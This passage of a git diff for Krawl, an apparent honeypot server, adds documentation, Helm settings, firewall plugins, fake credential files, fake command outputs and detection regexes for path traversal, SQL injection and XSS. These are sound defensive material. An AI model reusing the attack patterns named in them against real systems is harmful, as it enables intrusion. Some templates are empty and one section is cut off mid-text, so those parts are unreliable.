# 0-100% + +canary: + token_url: null # External canary alert URL +``` + +## Logging + +Three rotating log files (1MB max, 5 backups each): + +| Logger | File | Content | +|--------|------|---------| +| `krawl.app` | `logs/krawl.log` | Application events, errors | +| `krawl.access` | `logs/access.log` | HTTP access, attack detections | +| `krawl.credentials` | `logs/credentials.log` | Captured login attempts | + +## Docker + +```dockerfile +FROM python:3.13-slim +# Non-root user: krawl:1000 +# Volumes: /app/logs, /app/data, /app/exports +CMD ["uvicorn", "app:app", "--host", "0.0.0.0", "--port", "5000", "--app-dir", "src"] +``` + +## Key Data Flows + +### Honeypot Request + +``` +Client → BanCheck → DeceptionMiddleware → HoneypotRouter + │ + ┌─────────┴──────────┐ + │ tracker.record() │ + │ ├─ in-memory ++ │ + │ ├─ detect 
attacks │ + │ └─ DB persist │ + └────────────────────┘ +``` + +### Dashboard Load + +``` +Browser → GET /{secret}/ → SSR initial stats + Jinja2 render + → Alpine.js init → HTMX fires hx-get for each table + → User clicks Attacks tab → setTimeout → init Leaflet + Chart.js + → Leaflet fetches /api/all-ips → plots markers + → Chart.js fetches /api/attack-types-stats → renders doughnut +``` + +### IP Enrichment Pipeline + +``` +APScheduler (every 5 min) + └─ fetch_ip_rep.main() + ├─ DB: get unenriched IPs (limit 50) + ├─ ip-api.com → geolocation (country, city, ASN, coords) + ├─ iprep.lcrawl.com → blocklist memberships + └─ DB: update IpStats with enriched data +``` diff --git a/docs/backups.md b/docs/backups.md new file mode 100644 index 0000000..84bf5db --- /dev/null +++ b/docs/backups.md @@ -0,0 +1,10 @@ +# Enable Database Dump Job for Backups + +To enable the database dump job, set the following variables (*config file example*) + +```yaml +backups: + path: "backups" # where backup will be saved + cron: "*/30 * * * *" # frequency of the cronjob + enabled: true +``` diff --git a/docs/canary-token.md b/docs/canary-token.md new file mode 100644 index 0000000..6e6c314 --- /dev/null +++ b/docs/canary-token.md @@ -0,0 +1,10 @@ +# Customizing the Canary Token + +To create a custom canary token, visit https://canarytokens.org + +and generate a "Web bug" canary token. + +This optional token is triggered when a crawler fully traverses the webpage until it reaches 0. At that point, a URL is returned. When this URL is requested, it sends an alert to the user via email, including the visitor's IP address and user agent. + + +To enable this feature, set the canary token URL [using the environment variable](../README.md#configuration-via-enviromental-variables) `KRAWL_CANARY_TOKEN_URL`. 
diff --git a/docs/dashboard.md b/docs/dashboard.md new file mode 100644 index 0000000..ace7955 --- /dev/null +++ b/docs/dashboard.md @@ -0,0 +1,21 @@ +# Dashboard + +Access the dashboard at `http://<server-ip>:<port>/<dashboard-path>` + +The dashboard shows: +- Total and unique accesses +- Suspicious activity and attack detection +- Top IPs, paths, user-agents and GeoIP localization +- Real-time monitoring + +The attackers' access to the honeypot endpoint and related suspicious activities (such as failed login attempts) are logged. + +Krawl also implements a scoring system designed to distinguish between malicious and legitimate behavior on the website. + +![dashboard-1](../img/dashboard-1.png) + +The top IP addresses are shown along with top paths and User Agents + +![dashboard-2](../img/dashboard-2.png) + +![dashboard-3](../img/dashboard-3.png) diff --git a/docs/firewall-exporters.md b/docs/firewall-exporters.md new file mode 100644 index 0000000..85d88cd --- /dev/null +++ b/docs/firewall-exporters.md @@ -0,0 +1,50 @@ +# Firewall exporters documentation + +The firewall export feature is implemented through a strategy pattern with an abstract class and a series of subclasses that implement the specific export logic for each firewall system: + +```mermaid + classDiagram + class FWType{ + +getBanlist() +} +FWType <|-- Raw +class Raw{ } +FWType <|-- Iptables +class Iptables{ } +note for Iptables "implements the getBanlist method for iptables rules" +``` + +Rule sets are generated by the `top_attacking_ips__export-malicious-ips` task, which writes the files to the `exports_path` configuration path. 
Files are named after the specific firewall that they implement as `[firewall]_banlist.txt`, except for the raw file, which is called `malicious_ips.txt` to support legacy integrations + +## Adding firewall exporters + +To add a firewall exporter, create a new Python class in `src/firewall` that implements the `FWType` class + +> example with `Yourfirewall` class in the `yourfirewall.py` file +```python +from typing_extensions import override +from firewall.fwtype import FWType + +class Yourfirewall(FWType): + + @override + def getBanlist(self, ips) -> str: + """ + Generate raw list of bad IP addresses. + + Args: + ips: List of IP addresses to ban + + Returns: + String containing raw ips, one per line + """ + if not ips: + return "" + # Add here code implementation +``` + +Then add the following to the `src/server.py` and `src/tasks/top_attacking_ips.py` + +```python +from firewall.yourfirewall import Yourfirewall +``` diff --git a/docs/honeypot.md b/docs/honeypot.md new file mode 100644 index 0000000..6baffab --- /dev/null +++ b/docs/honeypot.md @@ -0,0 +1,52 @@ +# Honeypot + +Below is a complete overview of the Krawl honeypot's capabilities + +## robots.txt +The actual (juicy) robots.txt configuration [is the following](../src/templates/html/robots.txt). + +## Honeypot pages + +### Common Login Attempts +Requests to common admin endpoints (`/admin/`, `/wp-admin/`, `/phpMyAdmin/`) return a fake login page. Any login attempt triggers a 1-second delay to simulate real processing and is fully logged in the dashboard (credentials, IP, headers, timing). + +![admin page](../img/admin-page.png) + +### Common Misconfiguration Paths +Requests to paths like `/backup/`, `/config/`, `/database/`, `/private/`, or `/uploads/` return a fake directory listing populated with "interesting" files, each assigned a random file size to look realistic. 
+ +![directory-page](../img/directory-page.png) + +### Environment File Leakage +The `.env` endpoint exposes fake database connection strings, **AWS API keys**, and **Stripe secrets**. It intentionally returns an error due to the `Content-Type` being `application/json` instead of plain text, mimicking a "juicy" misconfiguration that crawlers and scanners often flag as information leakage. + +### Server Error Information +The `/server` page displays randomly generated fake error information for each known server. + +![server and env page](../img/server-and-env-page.png) + +### API Endpoints with Sensitive Data +The pages `/api/v1/users` and `/api/v2/secrets` show fake users and random secrets in JSON format + +![users and secrets](../img/users-and-secrets.png) + +### Exposed Credential Files +The pages `/credentials.txt` and `/passwords.txt` show fake users and random secrets + +![credentials and passwords](../img/credentials-and-passwords.png) + +### SQL Injection and XSS Detection +Pages such as `/users`, `/search`, `/contact`, `/info`, `/input`, and `/feedback`, along with APIs like `/api/sql` and `/api/database`, are designed to lure attackers into performing attacks such as **SQL injection** or **XSS**. + +![sql injection](../img/sql_injection.png) + +Automated tools like **SQLMap** will receive a different randomized database error on each request, increasing scan noise and confusing the attacker. All detected attacks are logged and displayed in the dashboard. + +### Path Traversal Detection +Krawl detects and responds to **path traversal** attempts targeting common system files like `/etc/passwd`, `/etc/shadow`, or Windows system paths. When an attacker tries to access sensitive files using patterns like `../../../etc/passwd` or encoded variants (`%2e%2e/`, `%252e`), Krawl returns convincing fake file contents with realistic system users, UIDs, GIDs, and shell configurations. This wastes attacker time while logging the full attack pattern. 
+ +### XXE (XML External Entity) Injection +The `/api/xml` and `/api/parser` endpoints accept XML input and are designed to detect **XXE injection** attempts. When attackers try to exploit external entity declarations (`:5000` - -### Add the repository (if applicable) - -```bash -helm repo add krawl https://github.com/BlessedRebuS/Krawl -helm repo update -``` - -### Install from OCI Registry - -```bash -helm install krawl oci://ghcr.io/blessedrebus/krawl-chart --version 0.2.1 -``` - -Or with a specific namespace: - -```bash -helm install krawl oci://ghcr.io/blessedrebus/krawl-chart --version 0.2.1 -n krawl --create-namespace -``` - -### Install the chart locally - -```bash -helm install krawl ./helm -``` - -### Install with custom values - -```bash -helm install krawl ./helm -f values.yaml -``` - -### Install in a specific namespace - -```bash -helm install krawl ./helm -n krawl --create-namespace -``` +Then access the deception server at `http://:5000` ## Configuration @@ -221,16 +149,6 @@ The following table lists the main configuration parameters of the Krawl chart a | `resources.requests.cpu` | CPU request | `100m` | | `resources.requests.memory` | Memory request | `64Mi` | -### Autoscaling - -| Parameter | Description | Default | -|-----------|-------------|---------| -| `autoscaling.enabled` | Enable horizontal pod autoscaling | `false` | -| `autoscaling.minReplicas` | Minimum replicas | `1` | -| `autoscaling.maxReplicas` | Maximum replicas | `1` | -| `autoscaling.targetCPUUtilizationPercentage` | Target CPU utilization | `70` | -| `autoscaling.targetMemoryUtilizationPercentage` | Target memory utilization | `80` | - ### Network Policy | Parameter | Description | Default | @@ -248,68 +166,24 @@ kubectl get secret krawl-server -n krawl-system \ ## Usage Examples -### Basic Installation +You can override individual values with `--set` without a values file: ```bash -helm install krawl ./helm -``` - -### Installation with Custom Domain - -```bash -helm install 
krawl ./helm \ - --set ingress.hosts[0].host=honeypot.example.com -``` - -### Enable Canary Tokens - -```bash -helm install krawl ./helm \ +helm install krawl oci://ghcr.io/blessedrebus/krawl-chart --version 1.1.0 \ + --set ingress.hosts[0].host=honeypot.example.com \ --set config.canary.token_url=https://canarytokens.com/your-token ``` -### Configure Custom API Endpoint - -```bash -helm install krawl ./helm \ - --set config.api.server_url=https://api.example.com \ - --set config.api.server_port=443 -``` - -### Create Values Override File - -Create `custom-values.yaml`: - -```yaml -config: - server: - port: 8080 - delay: 500 - canary: - token_url: https://your-canary-token-url - dashboard: - secret_path: /super-secret-path - crawl: - max_pages_limit: 500 - ban_duration_seconds: 3600 -``` - -Then install: - -```bash -helm install krawl ./helm -f custom-values.yaml -``` - ## Upgrading ```bash -helm upgrade krawl ./helm +helm upgrade krawl oci://ghcr.io/blessedrebus/krawl-chart --version 1.1.0 -f values.yaml ``` ## Uninstalling ```bash -helm uninstall krawl +helm uninstall krawl -n krawl-system ``` ## Troubleshooting @@ -348,7 +222,6 @@ kubectl logs -l app.kubernetes.io/name=krawl - `configmap.yaml` - Application configuration - `pvc.yaml` - Persistent volume claim - `ingress.yaml` - Ingress configuration - - `hpa.yaml` - Horizontal pod autoscaler - `network-policy.yaml` - Network policies ## Support diff --git a/helm/templates/configmap.yaml b/helm/templates/configmap.yaml index f81d319..73ffbb5 100644 --- a/helm/templates/configmap.yaml +++ b/helm/templates/configmap.yaml @@ -22,6 +22,14 @@ data: token_tries: {{ .Values.config.canary.token_tries }} dashboard: secret_path: {{ .Values.config.dashboard.secret_path | toYaml }} + backups: + path: {{ .Values.config.backups.path | quote }} + cron: {{ .Values.config.backups.cron | quote }} + enabled: {{ .Values.config.backups.enabled }} + exports: + path: {{ .Values.config.exports.path | quote }} + logging: + level: {{ 
.Values.config.logging.level | quote }} database: path: {{ .Values.config.database.path | quote }} retention_days: {{ .Values.config.database.retention_days }} diff --git a/helm/templates/deployment.yaml b/helm/templates/deployment.yaml index f24261c..730f774 100644 --- a/helm/templates/deployment.yaml +++ b/helm/templates/deployment.yaml @@ -5,9 +5,9 @@ metadata: labels: {{- include "krawl.labels" . | nindent 4 }} spec: - {{- if not .Values.autoscaling.enabled }} replicas: {{ .Values.replicaCount }} - {{- end }} + strategy: + type: Recreate selector: matchLabels: {{- include "krawl.selectorLabels" . | nindent 6 }} @@ -29,7 +29,7 @@ spec: {{- toYaml . | nindent 8 }} {{- end }} containers: - - name: {{ .Chart.Name }} + - name: krawl {{- with .Values.securityContext }} securityContext: {{- toYaml . | nindent 12 }} diff --git a/helm/templates/hpa.yaml b/helm/templates/hpa.yaml deleted file mode 100644 index 0f64b10..0000000 --- a/helm/templates/hpa.yaml +++ /dev/null @@ -1,32 +0,0 @@ -{{- if .Values.autoscaling.enabled }} -apiVersion: autoscaling/v2 -kind: HorizontalPodAutoscaler -metadata: - name: {{ include "krawl.fullname" . }} - labels: - {{- include "krawl.labels" . | nindent 4 }} -spec: - scaleTargetRef: - apiVersion: apps/v1 - kind: Deployment - name: {{ include "krawl.fullname" . 
}} - minReplicas: {{ .Values.autoscaling.minReplicas }} - maxReplicas: {{ .Values.autoscaling.maxReplicas }} - metrics: - {{- if .Values.autoscaling.targetCPUUtilizationPercentage }} - - type: Resource - resource: - name: cpu - target: - type: Utilization - averageUtilization: {{ .Values.autoscaling.targetCPUUtilizationPercentage }} - {{- end }} - {{- if .Values.autoscaling.targetMemoryUtilizationPercentage }} - - type: Resource - resource: - name: memory - target: - type: Utilization - averageUtilization: {{ .Values.autoscaling.targetMemoryUtilizationPercentage }} - {{- end }} -{{- end }} diff --git a/helm/values.yaml b/helm/values.yaml index fb9be82..8b4a907 100644 --- a/helm/values.yaml +++ b/helm/values.yaml @@ -3,7 +3,7 @@ replicaCount: 1 image: repository: ghcr.io/blessedrebus/krawl pullPolicy: Always - tag: "1.0.0" + tag: "1.1.0" imagePullSecrets: [] nameOverride: "krawl" @@ -54,13 +54,6 @@ resources: # If not set, container will use its default timezone timezone: "" -autoscaling: - enabled: false - minReplicas: 1 - maxReplicas: 1 - targetCPUUtilizationPercentage: 70 - targetMemoryUtilizationPercentage: 80 - nodeSelector: {} tolerations: [] @@ -84,6 +77,14 @@ config: token_tries: 10 dashboard: secret_path: null # Auto-generated if not set, or set to "/my-secret-dashboard" + backups: + path: "backups" + enabled: false + cron: "*/30 * * * *" + exports: + path: "exports" + logging: + level: "INFO" # DEBUG, INFO, WARNING, ERROR, CRITICAL database: path: "data/krawl.db" retention_days: 30 @@ -307,6 +308,295 @@ wordlists: - .git/ - keys/ - credentials/ + fake_files: + - name: settings.conf + size_min: 1024 + size_max: 8192 + perms: "-rw-r--r--" + - name: database.sql + size_min: 10240 + size_max: 102400 + perms: "-rw-r--r--" + - name: .htaccess + size_min: 256 + size_max: 1024 + perms: "-rw-r--r--" + - name: README.md + size_min: 512 + size_max: 2048 + perms: "-rw-r--r--" + fake_directories: + - name: config + size: "4096" + perms: drwxr-xr-x + - name: backup + 
size: "4096" + perms: drwxr-xr-x + - name: logs + size: "4096" + perms: drwxrwxr-x + - name: data + size: "4096" + perms: drwxr-xr-x + fake_passwd: + system_users: + - "root:x:0:0:root:/root:/bin/bash" + - "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin" + - "bin:x:2:2:bin:/bin:/usr/sbin/nologin" + - "sys:x:3:3:sys:/dev:/usr/sbin/nologin" + - "sync:x:4:65534:sync:/bin:/bin/sync" + - "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin" + - "backup:x:34:34:backup:/var/backups:/usr/sbin/nologin" + - "mysql:x:108:113:MySQL Server,,,:/nonexistent:/bin/false" + - "sshd:x:109:65534::/run/sshd:/usr/sbin/nologin" + uid_min: 1000 + uid_max: 2000 + gid_min: 1000 + gid_max: 2000 + shells: + - /bin/bash + - /bin/sh + - /usr/bin/zsh + fake_shadow: + system_entries: + - "root:$6$rounds=656000$fake_salt_here$fake_hash_data:19000:0:99999:7:::" + - "daemon:*:19000:0:99999:7:::" + - "bin:*:19000:0:99999:7:::" + - "sys:*:19000:0:99999:7:::" + - "www-data:*:19000:0:99999:7:::" + hash_prefix: "$6$rounds=656000$" + salt_length: 16 + hash_length: 86 + xxe_responses: + file_access: + template: | + + + success + {content} + + entity_processed: + template: | + + + success + Entity processed successfully + {entity_value} + + entity_values: + - "admin_credentials" + - "database_connection" + - "api_secret_key" + - "internal_server_ip" + - "encrypted_password" + error: + template: | + + + error + {message} + + messages: + - "External entity not allowed" + - "XML parsing error" + - "Invalid entity reference" + default_content: "root:x:0:0:root:/root:/bin/bash\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin" + command_outputs: + id: + - "uid={uid}(www-data) gid={gid}(www-data) groups={gid}(www-data)" + - "uid={uid}(nginx) gid={gid}(nginx) groups={gid}(nginx)" + - "uid={uid}(apache) gid={gid}(apache) groups={gid}(apache)" + whoami: + - www-data + - nginx + - apache + - webapp + - nobody + uname: + - "Linux webserver 5.4.0-42-generic #46-Ubuntu SMP Fri Jul 10 00:24:02 UTC 2020 x86_64 
x86_64 x86_64 GNU/Linux" + - "Linux app-server 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 GNU/Linux" + - "Linux prod-server 5.15.0-56-generic #62-Ubuntu SMP Tue Nov 22 19:54:14 UTC 2022 x86_64 GNU/Linux" + pwd: + - /var/www/html + - /home/webapp/public_html + - /usr/share/nginx/html + - /opt/app/public + ls: + - ["index.php", "config.php", "uploads", "assets", "README.md", ".htaccess", "admin"] + - ["app.js", "package.json", "node_modules", "public", "views", "routes"] + - ["index.html", "css", "js", "images", "data", "api"] + cat_config: | + + network_commands: + - "bash: wget: command not found" + - "curl: (6) Could not resolve host: example.com" + - "Connection timeout" + - "bash: nc: command not found" + - "Downloaded {size} bytes" + generic: + - "sh: 1: syntax error: unexpected end of file" + - "Command executed successfully" + - "" + - "/bin/sh: {num}: not found" + - "bash: command not found" + uid_min: 1000 + uid_max: 2000 + gid_min: 1000 + gid_max: 2000 + download_size_min: 100 + download_size_max: 10000 + sql_errors: + mysql: + syntax_errors: + - "You have an error in your SQL syntax" + - "check the manual that corresponds to your MySQL server version" + table_errors: + - "Table '{table}' doesn't exist" + - "Unknown table '{table}'" + column_errors: + - "Unknown column '{column}' in 'field list'" + - "Unknown column '{column}' in 'where clause'" + postgresql: + syntax_errors: + - "ERROR: syntax error at or near" + - "ERROR: unterminated quoted string" + relation_errors: + - "ERROR: relation \"{table}\" does not exist" + column_errors: + - "ERROR: column \"{column}\" does not exist" + mssql: + syntax_errors: + - "Incorrect syntax near" + - "Unclosed quotation mark" + object_errors: + - "Invalid object name '{table}'" + column_errors: + - "Invalid column name '{column}'" + oracle: + syntax_errors: + - "ORA-00933: SQL command not properly ended" + - "ORA-00904: invalid identifier" + table_errors: + - "ORA-00942: table or view does 
not exist" + sqlite: + syntax_errors: + - "near \"{token}\": syntax error" + table_errors: + - "no such table: {table}" + column_errors: + - "no such column: {column}" + mongodb: + query_errors: + - "Failed to parse" + - "unknown operator" + collection_errors: + - "ns not found" + server_errors: + nginx: + versions: + - "1.18.0" + - "1.20.1" + - "1.22.0" + - "1.24.0" + template: | + + + + {code} {message} + + + +

An error occurred.

+

Sorry, the page you are looking for is currently unavailable.
+ Please try again later.

+

If you are the system administrator of this resource then you should check the error log for details.

+

Faithfully yours, nginx/{version}.

+ + + apache: + versions: + - "2.4.41" + - "2.4.52" + - "2.4.54" + - "2.4.57" + os: + - Ubuntu + - Debian + - CentOS + template: | + + + {code} {message} + +

{message}

+

The requested URL was not found on this server.

+
+
Apache/{version} ({os}) Server at {host} Port 80
+ + iis: + versions: + - "10.0" + - "8.5" + - "8.0" + template: | + + + + + {code} - {message} + + + +
+

{code} - {message}

+

The page cannot be displayed because an internal server error has occurred.

+
+ + + attack_patterns: + path_traversal: "(\\.\\.| %2e%2e|%252e|/etc/passwd|/etc/shadow|\\.\\.\\\\/|\\.\\./|/windows/system32|c:\\\\windows|/proc/self|\\.\\.\\.%2f|\\.\\.\\.%5c|etc/passwd|etc/shadow)" + sql_injection: "('|\"|`|--|#|/\\*|\\*/|\\bunion\\b|\\bunion\\s+select\\b|\\bor\\b.*=.*|\\band\\b.*=.*|'.*or.*'.*=.*'|\\bsleep\\b|\\bwaitfor\\b|\\bdelay\\b|\\bbenchmark\\b|;.*select|;.*drop|;.*insert|;.*update|;.*delete|\\bexec\\b|\\bexecute\\b|\\bxp_cmdshell\\b|information_schema|table_schema|table_name)" + xss_attempt: "($ +``` + +**Explanation:** The filter matches any line that contains only an IP address (`` is fail2ban's placeholder for IP addresses). In this case, we use **one IP per row** as a result of the Krawl detection engine for attackers. + +### 2. Create the Jail Configuration [krawl-jail.conf](krawl-jail.conf) +### 2.1 Krawl is on the same host +Create `/etc/fail2ban/jail.d/krawl-jail.conf` and replace the `logpath` with the path to the krawl `malicious_ips.txt`: + +```ini +[krawl] +enabled = true +filter = krawl +logpath = /path/to/malicious_ips.txt +backend = auto +maxretry = 1 +findtime = 1 +bantime = 2592000 +action = iptables-allports[name=krawl-ban, port=all, protocol=all] +``` +### 2.2 Krawl is on a different host + +If Krawl is deployed on another instance, you can use the Krawl API to get malicious IPs via a **curl** command scheduled with **cron**. + +```bash +curl http://your-krawl-instance/dashboard-path/api/get_banlist?fwtype=raw -o malicious_ips.txt +``` + +#### Cron Setup + +Edit your crontab to refresh the malicious IPs list: + +```bash +sudo crontab -e +``` + +Add this single cron job to fetch malicious IPs every hour: + +```bash +0 * * * * curl http://your-krawl-instance/dashboard-path/api/get_banlist?fwtype=raw -o /tmp/malicious_ips.txt +``` + +Replace the `krawl-jail.conf` **logpath** with `/tmp/malicious_ips.txt`. + +### 3. 
Reload Fail2Ban + +```bash +sudo systemctl restart fail2ban +``` + +Verify the jail is active: + +```bash +sudo fail2ban-client status krawl +``` + +## How It Works + +### When an IP is Added to malicious_ips.txt + +1. **Fail2ban detects the new line** in the log file (via inotify) +2. **Filter regex matches** the IP address pattern +3. **maxretry check:** Since maxretry=1, ban immediately +4. **Action triggered:** `iptables-allports` adds a firewall block rule +5. **IP is blocked** on all ports and protocols + +### When the 30-Day Rotation Occurs + +Your malicious IPs file is rotated every 30 days. With `bantime = 2592000` (30 days), bans expire on the same 30-day cycle, so an IP that drops out of the file is automatically unbanned once its ban time elapses. + +If you used `bantime = -1` (permanent), old IPs would remain banned forever even after removal from the file. This option is not recommended because external IPs can rotate and are unlikely to be static. + +## Monitoring + +### Check Currently Banned IPs + +```bash +sudo fail2ban-client status krawl +``` + +### View Fail2Ban Logs + +```bash +sudo tail -f /var/log/fail2ban.log | grep krawl +``` + +## Management Commands + +### Manually Ban an IP + +```bash +sudo fail2ban-client set krawl banip 192.168.1.100 +``` + +### Manually Unban an IP + +```bash +sudo fail2ban-client set krawl unbanip 192.168.1.100 +``` + + +### Clear All Bans in Krawl Jail + +```bash +sudo fail2ban-client set krawl unbanall +``` + +### Restart the Krawl Jail Only + +```bash +sudo fail2ban-client restart krawl +``` + +## References + +- [Fail2Ban Documentation](https://www.fail2ban.org/wiki/index.php/Main_Page) +- [Fail2Ban Configuration Manual](https://www.fail2ban.org/wiki/index.php/Jail.conf) +- [Iptables Basics](https://www.digitalocean.com/community/tutorials/iptables-essentials-common-firewall-rules-and-commands) diff --git a/plugins/fail2ban/krawl-filter.conf b/plugins/fail2ban/krawl-filter.conf new file mode 100644 index 0000000..ee1bbad --- /dev/null +++ b/plugins/fail2ban/krawl-filter.conf @@ -0,0 +1,2 @@ +[Definition] +failregex = ^<HOST>$ \ No newline at 
end of file diff --git a/plugins/fail2ban/krawl-jail.conf b/plugins/fail2ban/krawl-jail.conf new file mode 100644 index 0000000..61b5e44 --- /dev/null +++ b/plugins/fail2ban/krawl-jail.conf @@ -0,0 +1,9 @@ +[krawl] +enabled = true +filter = krawl +logpath = /path/to/malicious_ips.txt ; update this path to where your krawl malicious IPs are logged +backend = auto +maxretry = 1 +findtime = 1 +bantime = 2592000 ; 30 days +action = iptables-allports[name=krawl-ban, port=all, protocol=all] \ No newline at end of file diff --git a/plugins/iptables/README.md b/plugins/iptables/README.md new file mode 100644 index 0000000..a71b3b4 --- /dev/null +++ b/plugins/iptables/README.md @@ -0,0 +1,302 @@ +# Iptables + Krawl Integration + +## Overview + +This guide explains how to integrate **iptables** with Krawl to automatically block detected malicious IPs at the firewall level. The iptables integration fetches the malicious IP list directly from Krawl's API and applies firewall rules. + +## Architecture + +``` +Krawl detects malicious IPs + ↓ +Stores in database + ↓ +API endpoint + ↓ +Cron job fetches list + ↓ +Iptables firewall blocks IPs + ↓ +All traffic from banned IPs dropped +``` + +## Prerequisites + +- Linux system with iptables installed (typically pre-installed) +- Krawl running with API accessible +- Root/sudo access +- Curl or wget for HTTP requests +- Cron for scheduling (or systemd timer as alternative) + +## Installation & Setup + +### 1. Create the [krawl-iptables.sh](krawl-iptables.sh) script + +```bash +#!/bin/bash + +curl -s https://your-krawl-instance/your-dashboard-path/api/get_banlist?fwtype=iptables | while read ip; do + iptables -C INPUT -s "$ip" -j DROP || iptables -A INPUT -s "$ip" -j DROP; +done +``` + +Make it executable: +```bash +sudo chmod +x ./krawl-iptables.sh +``` + +### 2. Test the Script + +```bash +sudo ./krawl-iptables.sh +``` + +### 3. 
Schedule with Cron + +Edit root crontab: +```bash +sudo crontab -e +``` + +Add this line to sync IPs every hour: + +```bash +0 * * * * /path/to/krawl-iptables.sh +``` + +## How It Works + +### When the Script Runs + +1. **Fetch IPs** from Krawl API (`/api/get_banlist?fwtype=iptables`) +2. **Add new DROP rules** for each IP +3. **Rules are applied immediately** at kernel level + +## Monitoring + +### Check Active Rules + +View all KRAWL-BAN rules: +```bash +sudo iptables -L KRAWL-BAN -n +``` + +Count blocked IPs: +```bash +sudo iptables -L KRAWL-BAN -n | tail -n +3 | wc -l +``` + +### Check Script Logs + +```bash +sudo tail -f /var/log/krawl-iptables-sync.log +``` + +### Monitor in Real-Time + +Watch dropped packets (requires kernel logging): +```bash +sudo tail -f /var/log/syslog | grep "IN=.*OUT=" +``` + +## Management Commands + +### Manually Block an IP + +```bash +sudo iptables -A KRAWL-BAN -s 192.168.1.100 -j DROP +``` + +### Manually Unblock an IP + +```bash +sudo iptables -D KRAWL-BAN -s 192.168.1.100 -j DROP +``` + +### List All Blocked IPs + +```bash +sudo iptables -L KRAWL-BAN -n | grep DROP +``` + +### Clear All Rules + +```bash +sudo iptables -F KRAWL-BAN +``` + +### Disable the Chain (Temporarily) + +```bash +sudo iptables -D INPUT -j KRAWL-BAN +``` + +### Re-enable the Chain + +```bash +sudo iptables -I INPUT -j KRAWL-BAN +``` + +### View Statistics + +```bash +sudo iptables -L KRAWL-BAN -n -v +``` + +## Persistent Rules (Survive Reboot) + +### Save Current Rules + +```bash +sudo iptables-save > /etc/iptables/rules.v4 +``` + +### Restore on Boot + +Install iptables-persistent: +```bash +sudo apt-get install iptables-persistent +``` + +During installation, choose "Yes" to save current IPv4 and IPv6 rules. 
+ +To update later: +```bash +sudo iptables-save > /etc/iptables/rules.v4 +sudo systemctl restart iptables +``` + +## Performance Considerations + +### For Your Setup + +- **Minimal overhead** — Iptables rules are processed at kernel level (very fast) +- **No logging I/O** — Blocked IPs are dropped before application sees them +- **Scales to thousands** — Iptables can efficiently handle 10,000+ rules + +### Optimization Tips + +1. **Use a custom chain** — Isolates Krawl rules from other firewall rules +2. **Schedule appropriately** — Every hour is usually sufficient; adjust based on threat level +3. **Monitor rule count** — Check periodically to ensure the script is working +4. **Consider IPSET** — For 10,000+ IPs, use ipset instead (more efficient) + +### Using IPSET (Advanced) + +For large-scale deployments, ipset is more efficient than individual iptables rules: + +```bash +# Create ipset +sudo ipset create krawl-ban hash:ip + +# Add IPs to ipset +while read ip; do + sudo ipset add krawl-ban "$ip" +done + +# Single iptables rule references the ipset +sudo iptables -I INPUT -m set --match-set krawl-ban src -j DROP +``` + +## Troubleshooting + +### Script Says "Failed to fetch IP list" + +Check API connectivity: +```bash +curl http://your-krawl-instance/api/get_banlist?fwtype=iptables +``` + +Verify: +- Krawl is running +- API URL is correct +- Firewall allows outbound HTTPS/HTTP +- No authentication required + +### Iptables Rules Not Persisting After Reboot + +Install and configure iptables-persistent: +```bash +sudo apt-get install iptables-persistent +sudo iptables-save > /etc/iptables/rules.v4 +``` + +### Script Runs but No Rules Added + +Check if chain exists: +```bash +sudo iptables -L KRAWL-BAN -n 2>&1 | head -1 +``` + +Check logs for errors: +```bash +sudo grep ERROR /var/log/krawl-iptables-sync.log +``` + +Verify IP format in Krawl API response: +```bash +curl http://your-krawl-instance/api/get_banlist?fwtype=iptables | head -10 +``` + +### Blocked 
Legitimate Traffic + +Check what IPs are blocked: +```bash +sudo iptables -L KRAWL-BAN -n | grep -E [0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3} +``` + +Unblock an IP: +```bash +sudo iptables -D KRAWL-BAN -s 203.0.113.50 -j DROP +``` + +Report false positive to Krawl administrators. + +## Security Best Practices + +1. **Limit API access** — Restrict `/api/get_banlist` to trusted networks (if internal use) +2. **Use HTTPS** — Fetch from HTTPS endpoint if available +3. **Verify TLS certificates** — Add `-k` only if necessary, not by default +4. **Rate limit cron jobs** — Don't run too frequently to avoid DoS +5. **Monitor sync logs** — Alert on repeated failures +6. **Backup rules** — Periodically backup `/etc/iptables/rules.v4` + +## Integration with Krawl Workflow + +Combined with fail2ban and iptables: + +``` +Real-time events (fail2ban) + ↓ +Immediate IP bans (temporary) + ↓ +Hourly sync (iptables cron) + ↓ +Permanent block until next rotation + ↓ +30-day cleanup cycle +``` + +## Manual Integration Example + +Instead of cron, manually fetch and block: + +```bash +# Fetch malicious IPs +curl -s http://your-krawl-instance/api/get_banlist?fwtype=iptables > /tmp/malicious_ips.txt + +# Read and block each IP +while read ip; do + sudo iptables -A KRAWL-BAN -s "$ip" -j DROP +done < /tmp/malicious_ips.txt + +# Save rules +sudo iptables-save > /etc/iptables/rules.v4 +``` + +## References + +- [Iptables Man Page](https://linux.die.net/man/8/iptables) +- [Iptables Essentials](https://www.digitalocean.com/community/tutorials/iptables-essentials-common-firewall-rules-and-commands) +- [Ipset Documentation](https://ipset.netfilter.org/) +- [Linux Firewall Administration Guide](https://www.kernel.org/doc/html/latest/networking/nf_conntrack-sysctl.html) diff --git a/plugins/iptables/krawl-iptables.sh b/plugins/iptables/krawl-iptables.sh new file mode 100644 index 0000000..4239661 --- /dev/null +++ b/plugins/iptables/krawl-iptables.sh @@ -0,0 +1,6 @@ +#!/bin/bash +# This script 
fetches a list of malicious IPs from your Krawl instance and adds them to the iptables firewall to block incoming traffic from those IPs. + +curl -s https://your-krawl-instance/api/get_banlist?fwtype=iptables | while read ip; do + iptables -C INPUT -s "$ip" -j DROP || iptables -A INPUT -s "$ip" -j DROP; +done \ No newline at end of file diff --git a/plugins/nftables/README.md b/plugins/nftables/README.md new file mode 100644 index 0000000..0c49678 --- /dev/null +++ b/plugins/nftables/README.md @@ -0,0 +1,161 @@ +# Nftables + Krawl Integration + +## Overview + +This guide explains how to integrate **nftables** with Krawl to automatically block detected malicious IPs at the firewall level. Nftables is the modern replacement for iptables on newer Linux systems and provides more efficient IP set-based blocking. + +## Architecture + +``` +Krawl detects malicious IPs + ↓ +Stores in database + ↓ +API endpoint + ↓ +Cron job fetches list + ↓ +Nftables firewall blocks IPs + ↓ +All traffic from banned IPs dropped +``` + +## Prerequisites + +- Modern Linux system with nftables installed (Ubuntu 22+, Debian 12+, RHEL 9+) +- Krawl running with API accessible +- Root/sudo access +- Curl for 